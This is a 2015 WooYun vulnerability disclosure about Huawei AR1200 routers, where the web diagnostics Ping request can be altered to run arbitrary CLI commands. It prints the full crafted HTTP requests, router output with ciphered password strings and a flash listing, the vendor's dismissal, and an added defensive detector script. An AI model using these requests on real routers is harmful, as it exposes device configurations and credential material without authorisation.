Huawei AR1200 series router backend arbitrary code execution
Vulnerability summary
Defect ID:          WooYun-2015-117671
Title:              Huawei AR1200 series router backend arbitrary code execution
Vendor:             Huawei Technologies Co., Ltd.
Author:             1c3z
Submitted:          2015-06-02 11:15
Published:          2015-06-06 08:14
Type:               command execution
Severity:           medium
Self-assessed rank: 8
Status:             vendor was notified of the vulnerability but ignored it
Source:             http://www.wooyun.org
Tags:               remote command execution

Disclosure timeline:
2015-06-02:        details sent to the vendor, awaiting the vendor's handling
2015-06-06:        vendor chose to ignore the vulnerability; details disclosed to the public

Brief description: the school got a batch of routers, nobody knew how to configure them, so I poked at them a bit.
Detailed description: there is this function

System Management > Diagnostics > Ping

Packet capture:


POST http://192.168.1.119/view/main/config.cgi HTTP/1.1
Host: 192.168.1.119
Connection: keep-alive
Content-Length: 372
Origin: http://192.168.1.119
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/41.0.2272.76 Chrome/41.0.2272.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://192.168.1.119/view/main/default.html?Version=1.2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no

SessionID=M1iBvH1s0kak71m1qqL4YFpG7iW5dxin&MessageID=280&<rpc message-id="280" xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<edit-config operation="merge">
<target>
<running/>
</target>
<error-option>stop-on-error</error-option>
<config>
<featurename istop="true" type="cli">
<quit></quit>
<ping>192.168.1.1</ping>
</featurename>
</config>
</edit-config>
</rpc>]]>]]>



Replace <ping>192.168.1.1</ping>

with <display>current-configuration</display>

Response:


HTTP/1.1 200 OK
Server: AR
Date: tue, 02 jun 2015 10:29:11 GMT
Content-Type: text/xml
Content-Length: 1402
Set-Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
Connection: Close

<?xml version="1.0"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="280">
  <ok/>
</rpc-reply>

[V200R005C10SPC500]
#
drop illegal-mac alarm
#
wlan ac-global carrier id other ac id 0
#
pki realm default
enrollment self-signed
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default  
domain default_admin  
local-user admin password irreversible-cipher %@%@o~ho0DSI#)c&'+VR0uq2.fN8Hp:0#&|@-6h~GlN!:z~CfN;.%@%@
local-user admin privilege level 3
local-user admin service-type telnet web http
#
firewall zone Local
priority 16
#
interface Ethernet0/0/0
#
interface Ethernet0/0/1
#
interface Ethernet0/0/2
#
interface Ethernet0/0/3
#
interface Ethernet0/0/4
#
interface Ethernet0/0/5
#
interface Ethernet0/0/6
#
interface Ethernet0/0/7
#
interface GigabitEthernet0/0/0
#
interface GigabitEthernet0/0/1
ip address 192.168.1.119 255.255.255.0
#
interface Cellular0/0/0
#
interface Cellular0/0/1
#
interface NULL0
#
snmp-agent local-engineid 800007DB0330D17EED3C03
#
http server enable
http secure-server enable
#
user-interface con 0
authentication-mode password
set authentication password cipher %@%@C;@(!jYWE$qrE5"Q`q>7,7x)$I7.F$3jZ'IHQjB"E^|O7x,,%@%@
user-interface vty 0 4
authentication-mode aaa
#
wlan ac
#
voice
#
diagnose
#
return

Proof of vulnerability (same request, CLI element replaced with the following):
<dir></dir>

HTTP/1.1 200 OK
Server: AR
Date: tue, 02 jun 2015 10:30:29 GMT
Content-Type: text/xml
Content-Length: 917
Set-Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
Connection: Close

<?xml version="1.0"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="280">
  <ok/>
</rpc-reply>

Directory of flash:/

  Idx  Attr     Size(Byte)  Date        Time(LMT)  FileName
    0  -rw-        304,700  Mar 27 2015 15:22:32   sacrule.dat
    1  -rw-          3,850  Jun 02 2015 07:30:07   mon_file.txt
    2  -rw-    111,630,208  Jun 11 2014 03:05:56   AR1220F-V200R005C10SPC500.cc
    3  -rw-              0  Mar 27 2015 15:21:58   brdxpon_snmp_cfg.efs
    4  -rw-            694  Mar 30 2015 15:25:26   vrpcfg.zip
    5  -rw-            396  Mar 30 2015 15:25:26   private-data.txt
    6  drw-              -  Jun 11 2014 12:28:36   dhcp
    7  drw-              -  Jun 11 2014 12:28:38   security
    8  -rw-          1,260  Jun 11 2014 12:29:28   rsa_host_key.efs
    9  -rw-            540  Jun 11 2014 12:29:32   rsa_server_key.efs

510,484 KB total (401,132 KB free)
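As an added example (not part of the original report or of any Huawei code), the check below parses config.cgi POST bodies in the format captured above and flags any CLI element other than the ones the Ping diagnostics page itself emits; the allowlist, the session ID and the sample bodies are constructed assumptions.

```python
import xml.etree.ElementTree as ET

# Assumed allowlist: the only CLI elements the Ping diagnostics page is expected
# to place inside <featurename type="cli"> (taken from the captured request).
DIAG_ALLOWLIST = {"quit", "ping"}

# Constructed sample bodies in the config.cgi format captured on this page.
def make_body(cli_element: str, session: str = "SESSIONID_PLACEHOLDER") -> str:
    return (f"SessionID={session}&MessageID=280&"
            '<rpc message-id="280" xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">'
            '<edit-config operation="merge"><target><running/></target>'
            "<error-option>stop-on-error</error-option><config>"
            f'<featurename istop="true" type="cli"><quit></quit>{cli_element}'
            "</featurename></config></edit-config></rpc>]]>]]>")

LEGIT_BODY = make_body("<ping>192.168.1.1</ping>")
CONFIG_BODY = make_body("<display>current-configuration</display>")
DIR_BODY = make_body("<dir></dir>")

def extract_cli_commands(body: str) -> list[str]:
    """Return the CLI commands carried in a config.cgi POST body.

    The body is 'SessionID=..&MessageID=..&<rpc ...>...</rpc>]]>]]>': the XML
    starts at '<rpc' and ends at the NETCONF 1.0 end-of-message marker.
    """
    start = body.find("<rpc")
    if start < 0:
        return []
    xml_text = body[start:].split("]]>]]>", 1)[0]
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return []
    commands = []
    for elem in root.iter():
        # ElementTree prefixes tags with the default namespace: '{urn:...}tag'
        if elem.tag.rsplit("}", 1)[-1] == "featurename" and elem.get("type") == "cli":
            for child in elem:
                name = child.tag.rsplit("}", 1)[-1]
                commands.append(f"{name} {(child.text or '').strip()}".strip())
    return commands

def flag_unexpected(body: str) -> list[str]:
    """Commands in the body that the Ping page itself would never send."""
    return [cmd for cmd in extract_cli_commands(body)
            if cmd.split()[0] not in DIAG_ALLOWLIST]

if __name__ == "__main__":
    for label, body in [("legit", LEGIT_BODY), ("display", CONFIG_BODY), ("dir", DIR_BODY)]:
        print(label, flag_unexpected(body))
```

Anything this returns from a diagnostics-page session is worth an alert, since the page's own form only ever sends quit and ping.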

Remediation: you are the experts on that..



Copyright notice: when reposting, please credit the source: 1c3z@WooYun

Vulnerability response
Vendor response:
Severity: no impact, vendor ignored

Ignored at: 2015-06-06 08:14
Vendor reply: Thank you to the white hat for the attention paid to Huawei's security. After confirmation, this privilege is the default privilege of the logged-in user. It is not a vulnerability.

Latest status: none


[ This post was last edited by linda on 2015-10-28 17:25 ]